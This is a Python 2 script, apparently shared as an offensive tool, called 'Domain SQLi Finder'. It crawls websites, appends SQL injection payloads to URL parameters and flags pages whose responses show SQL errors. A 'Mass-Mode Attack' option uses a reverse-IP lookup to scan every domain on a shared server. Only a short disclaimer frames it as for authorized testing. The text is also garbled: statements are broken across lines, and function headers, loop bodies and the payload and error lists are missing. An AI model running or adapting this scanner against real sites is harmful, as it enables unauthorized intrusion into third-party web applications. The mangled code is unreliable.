Domain SQLi Finder - Py
Domain SQLi Finder - Py
# This was written for a Penetration Test assessment and is for educational purpose
only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing only!
import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
import DomainReverseIPLookUp
# The following three variables get their values from command line args, either
take user value or stick with the default ones
pagesToCrawl = "" # Number of pages
to crawl in a website
maxVulInjectableParam = "" # Maximum number
of vulnerable pages (parameters) to find
output = "" # Output
file name - append mode (a)
reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for
reverseIP lookup - write+ mode (w+)
crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result
for current crawl only - write+ mode (w+)
uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for
current scan only - write+ mode (w+)
errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors -
append mode (a)
sitesToScan = "" # Stores maximum
number of sites to scan on domain in case of Mass-Mode Attack
maxVulSites = "" # Stores maximum
number of vulnerable sites to find with Mass-Mode Attack
reverseFlag = 0 # Determines
whether reverseLookUp file is generated by script or user supplies it
maxVulSitesFlag = 0 # Keeps
track of how many vulnerable sites have been found in Mass-Mode Attack
verbose = 0 # Determines
what messages to display on screen (0 or 1)
Greetz to:
(www.garage4hackers.com)
GGGGGG\
GG __GG\
GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
\GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\
\______/ \_______|\__| \_______| \____gg | \_______|
gg\ gg |
gggggg |
\______/
###################################################################
"""
print "\tUsage: python %s [options]" % sys.argv[0]
print "\t\t-h help\n"
call_exit()
def call_exit():
print "\n\tExiting ...........\n"
sys.exit(0)
# Tests SQLi on all unique links and parameters by appending sqlPayload and
checking the source
def check_SQLi(uniqueUrls):
sqliUrls = []
# This list will contain sorted URLs ready to be appended with sqlPayloads
flag = 0
# Variable to check whether desired 'n' number of vulnerable pages have been
found
sqliUrls = list(set(sqliUrls)) # By
now this list has all injectable parameters ready to append sqlPayload
parsed = urlparse.urlparse(link) # Later used
to obtain website name
now = datetime.datetime.now() # Current
time of scanning to put in DSQLiResults output file
try:
fd_output = open(output, 'a')
fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" +
(now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to
output file
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % output
if verbose == 1:
print "\n[*] Testing SQLi on following URLs:"
for link in sqliUrls:
print "\t[-] URL: ", link
else:
print "\n[*] Testing SQLi on URL's ....."
# In the following loop, the counter flag plays role to find 'n' number of
vulnerable pages. If limited number of pages
# have to be found, the value of flag counter determines whether script has
found those number of pages or not. Once matches,
# it breaks all loops and come out. Else, if it has not touched the limit but
links in sqliUrls have finished, control comes
# out of all loops. But if (0) i.e. all pages have to be found, flag plays no
considerable role other than incrementing itself.
try:
source = urllib2.urlopen(link+pload).read()
# Appending sqlPayload and reading source for
errors
except urllib2.HTTPError, err:
if err.code == 500:
if verbose == 1:
print "\t\t[!] Error - HTTP Error 500: Internal
Server Error"
print "\t\t[-] Continuing with next link"
continue
else:
if verbose == 1:
print "\t\t[!] Error - HTTP Error xxx"
print "\t\t[-] Continuing with next link"
continue
for errors in sqlErrors:
if re.search(errors, source) != None:
# If any sql error found in source
fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " +
link+pload + "\n")
print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s)
\n" % (link+pload, errors)
if maxVulInjectableParam != 0:
# i.e. if 'n' number of vulnerable
parameters have to be found
if flag < maxVulInjectableParam:
flag = flag + 1
else:
break
else:
# i.e if all vulnerable pages
have to be found
flag = flag + 1
break
else:
if verbose == 1:
print "\t\t[-] Not Vulnerable - String (%s) not
found in response" % errors
else:
pass
if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:
# i.e. if 'n' pages have already been found
break
if flag != 0:
print "\n\t[-] Target is vulnerable to SQLi, check log file"
print "\t\t[-] %d injectable vulnerable parameters found" % (flag)
global maxVulSitesFlag
maxVulSitesFlag = maxVulSitesFlag + 1 # Increment
the flag which determines how many vulnerable sites to find in case of Mass-Mode
Attack
else:
print "\n\t[-] Target is not vulnerable to SQLi"
try:
fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
fd_output.close()
# Close the file on completion of each URL, so that log
file could be seen for
except IOError:
# result instantly, instead of waiting for whole
script to finish
print "\n\t[!] Error - file I/O error\n"
try:
fd_output.close()
except IOError:
pass
# Just finds the unique URLs from all crawled URLs and saves to list
# Concept is: Parse the URL, find its injectable parameter(s), check the
combination of [netlock, path and injectable parameters] with earlier found
# combinations, if unique, update our uniqueUrls list else goto next URL and parse
it for same procedure
def unique_urls(unsortedUrls):
print "\n[*] Finding unique URL's ....."
list_db = []
# Used as temporary storage to compare parameters
with already found ones
uniqueUrls = []
# This one will finally have unique URLs in it
for x in xrange(num):
list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)
[0]) # list_tmp would have all injectable parameters in it as elements
x = x + 1
except IndexError:
# In my case links generate error bcoz they include an external
URl and increase the number of "=" in link.
# accordingly the loop run 1 extra time and generates out of
index error
if verbose == 1:
print "\n\t[!] Error - List Index Out of Order - check %s
and report to author" % (errorDump)
try:
fd_errorDump = open(errorDump, 'a')
fd_errorDump.write("\n\t[*] Error occured inside
unique_urls function for:\t" + parsed.query)
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" %
errorDump
continue
if list_tmp in list_db:
# For the first URL, this condition would definitely fail
as list_db is empty
continue
# i.e. same parameters but with different values have
been found, so continue
else:
list_db.append(list_tmp)
# Update the found unique parameters
uniqueUrls.append(link)
# Update the List with unique complete URLs
if verbose == 1:
for link in uniqueUrls:
print "\t[-] Unique link found: ", link
try:
fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
for link in uniqueUrls:
fd_uniqueLinkDump.write(link + '\n')
fd_uniqueLinkDump.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" %
uniqueLinksDump
check_SQLi(uniqueUrls)
# Call SQLi check function to test SQLi vulnerability
spider = chilkat.CkSpider()
# Using Chilkat Library. Some modules are free.
spider.Initialize(url)
spider.AddUnspidered(url)
spider.CrawlNext()
crawlerOutput = []
# This list would have all the linksToCrawl number of
pages of URL
for i in range(0,int(pagesToCrawl)):
success = spider.CrawlNext()
if (success == True):
if verbose == 1:
if i%50 == 0:
print "\n[-] %d percent of %d pages to crawl
complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
print "\t", spider.lastUrl()
else:
sys.stdout.flush()
print ".",
# In non verbose case, it prints dot dot dot to show
the progress
crawlerOutput.append(spider.lastUrl())
else:
if (spider.get_NumUnspidered() == 0):
print "\n\t[-] No more URLs to spider"
i = i - 1
# Need to decrement, else gives +1 count for total
pages crawled
break
else:
print spider.lastErrorText()
continue
spider.SleepMs(10)
try:
fd_crawlDump = open(crawlDump, 'a')
# Logs
for link in crawlerOutput:
fd_crawlDump.write(link + '\n')
fd_crawlDump.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
if verbose == 1:
print "\n[*] Parsing URL's to collect links with '=' in them ....."
urlsWithParameters = []
# This list would have only those URLs which has '=' in them i.e.
injectable parameter(s)
for link in crawlerOutput:
if link.count("=") > 0:
urlsWithParameters.append(link)
if urlsWithParameters != []:
if verbose == 1:
print "\t[-] Done"
unique_urls(urlsWithParameters)
# Time to find unique URLs among all with '=' in them
else:
print "\n\t[!] No injectable parameter found"
now = datetime.datetime.now()
# Current time to put in DSQLiResults output file
try:
parsed = urlparse.urlparse(url)
fd_output = open(output, 'a')
fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" +
(now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to
output file
fd_output.write("\t\tNo injectable parameter found\n")
fd_output.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % output
if reverseFlag == 0:
# i.e. if --reverse switch is not used on console. That means, do
reverseIP Lookup and generate result
DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp,
verbose) # pass domain url, output file name and verbose level
try:
fd_reverseLookUp = open(reverseLookUp, 'r')
for url in fd_reverseLookUp.readlines():
sites.append(url)
# List sites contains all the domains hosted on server
except IOError:
print "\n\t[!] Error - %s file missing" % reverseLookUp
print "\t[-] Generate it using --reverse switch or get domains
from some reverse IP lookup website"
call_exit()
elif reverseFlag == 1:
# i.e. if --reverse switch is mentioned, then don't do reverse IP
Lookup and read data from already generated file
try:
fd_reverseLookUp = open(reverseLookUp, 'r')
for url in fd_reverseLookUp.readlines():
sites.append(url)
# List sites contains all the domains hosted on server
except IOError:
print "\n\t[!] Error - %s file missing" % reverseLookUp
print "\t[-] Generate it using --reverse switch or get domains
from some reverse IP lookup website"
call_exit()
if len(sites)%10 != 0:
sites = sites[0:(len(sites)%10)]
else:
sites = sites[0:((len(sites)+2)%10)]
if site[:7] != "http://":
# prepend http:// to url, if not already done by user
site = "http://" + site
# what about https site?
site = site[:-1]
# remove \n at the end of each element
print "-"*80
print "\n[*] Target URL - %s ....." % (site)
# Verify URL for its existance
if verify_URL(site) == True:
# Function call to verify URL for existance
print "\t[-] URL Verified\n"
crawl_site(site)
# Pass the site to crawl function
else:
print "\n\t[-] URL %s could not be verified, continuing
with next target in list" % site
deadLinks = deadLinks + 1
continue
except KeyboardInterrupt:
decision = raw_input("\n\t[?] how do you want to proceed?
[(C)ontinue with next target in list or (q)uit]: ")
if decision == 'C' or decision == 'c':
continue
elif decision == 'q':
print "\n[!] Error - user aborted"
call_exit()
else:
print "\n\tEnjoy: oo=========> (|)"
call_exit()
counter = counter + 1
# Counting for only those sites which really got scanned
try:
conn = httplib.HTTPConnection(host)
conn.request('HEAD', path)
status = conn.getresponse().status
conn.close()
except StandardError:
status = None
# Mind it - In group1 and group2, same paramters "crawl" and "pages" are
used. So on console whether uses --crawl or --dcrawl,
# they would update the same variable "crawl" and ultimately the global
variable pagesToCrawl. Same goes for "pages"
args = parser.parse_args()
# Check if value is passed to args. e.g. --crawl without value would pass
"None" to it and program would crash
# all of these switches have default value, so user either don't mention them
on command prompt or must put a value for them
if (args.crawl == None or args.pages == None or args.sites == None or
args.vulsites == None):
print "\n\t[!] Error - Insufficient number of value(s) passed to
argument(s)"
call_exit()
# Check to make sure numeral value of vulsites is less than sites and pages <
crawl
if args.sites < args.vulsites:
print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
call_exit()
elif args.crawl < args.pages:
print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
call_exit()
global reverseLookUp
# Declaring it here as it's been used couple of times in
this fuction
if args.URL != None:
# Verbose mode for --url
print "\t[-] Pages to crawl (default=500): ", (args.crawl)
print "\t[-] Vulnerable injectable parameters (pages) to
find in site (default=0 i.e. all): %d" % (args.pages)
print "\t[-] Output file name: %s" % (args.siteOutput)
if args.DURL != None:
# Verbose mode for --durl
print "\t[-] Number of sites to scan on domain (default=0
i.e all): ", (args.sites)
print "\t[-] Number of vulnerable sites to find on domain
(default=0 i.e. all possible): ", (args.vulsites)
print "\t[-] Pages to crawl in each site (default=500): ",
(args.crawl)
print "\t[-] Vulnerable injectable parameters (pages) to
find in each site (default=0 i.e. all): %d" % (args.pages)
if args.reverseLookUp != None:
# i.e. if on console the reverse.txt file names is
mentioned
print "\t[-] Reverse IP Look-up file needed to read
domains from: %s" % (args.reverseLookUp[0])
else:
print "\t[-] Reverse IP Look-up output file: %s" %
reverseLookUp
else:
# i.e. if value 0 is passed to --verbose
print "\n[*] Verbose Mode Off"
else:
# i.e. verbose has None Value, it's been passed
without value
print "\n[*] Vebose Mode Off (by default)"
global reverseFlag
# Determines whether reverseLookUp file is generated by
script or user supplies it
reverseFlag = 1
attack_Domain(args.DURL[0])
else:
# i.e. --reverse is not mentioned on command prompt. Our
code shall generate one.
print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
if verify_URL(args.DURL[0]) == True:
print "\t[-] Domain Verified\n"
attack_Domain(args.DURL[0])
else:
print "\n\t[-] Domain cound not be verified."
call_exit()
def main():
#clear_screen()
if len(sys.argv) < 2:
banner()
parseArgs()
# Parse command line arguments
call_exit()